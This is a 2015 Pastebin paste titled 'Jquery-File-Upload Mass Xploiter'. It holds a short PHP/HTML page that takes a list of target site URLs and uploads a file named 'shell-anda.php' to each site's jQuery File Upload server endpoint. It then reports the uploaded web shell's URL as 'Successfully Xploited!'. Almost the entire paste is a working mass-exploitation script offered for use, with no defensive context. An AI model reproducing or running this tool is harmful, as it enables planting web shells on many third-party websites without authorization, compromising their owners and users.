AgusSR

Jquery-File-Upload Mass Xploiter

Jul 25th, 2015
1,436
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <form method="post" action="" enctype="multipart/form-data">
  3. <textarea placeholder="http://www.target.com/" style="padding: 5px; resize: none; width: 400px; height: 200px; border: solid 1px #006400;" name="sites"></textarea><br>
  4. <input type="submit" name="go" value="Xploit!" style="margin: 5px auto; hight: 25px; width: 200px;">
  5. </form>
  6. <?php
  7. $site = explode("\r\n", $_POST['sites']);
  8. $go = $_POST['go'];
  9. if($go) {
  10. foreach($site as $sites) {
  11. $uploadfile = "shell-anda.php";
  12. $ch = curl_init("{$sites}/assets/global/plugins/jquery-file-upload/server/php/");
  13. curl_setopt($ch, CURLOPT_POST, 1);
  14. curl_setopt($ch, CURLOPT_POSTFIELDS,
  15. array('files[]'=>"@$uploadfile"));
  16. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  17. $postResult = curl_exec($ch);
  18. curl_close($ch);
  19. if(preg_match("/url|deleteUrl|deleteType/", $postResult)) {
  20. preg_match('/"url":"(.*?)"/', $postResult, $get);
  21. $loc = $get[1];
  22. echo "URL : <font color=green>$sites</font><br>";
  23. echo "Status : Successfully Xploited!<br>";
  24. echo "File : <a href='$loc' target='_blank'><font color=green>$loc</font></a><br>";
  25. }
  26. }
  27. }
  28. ?>
RAW Paste Data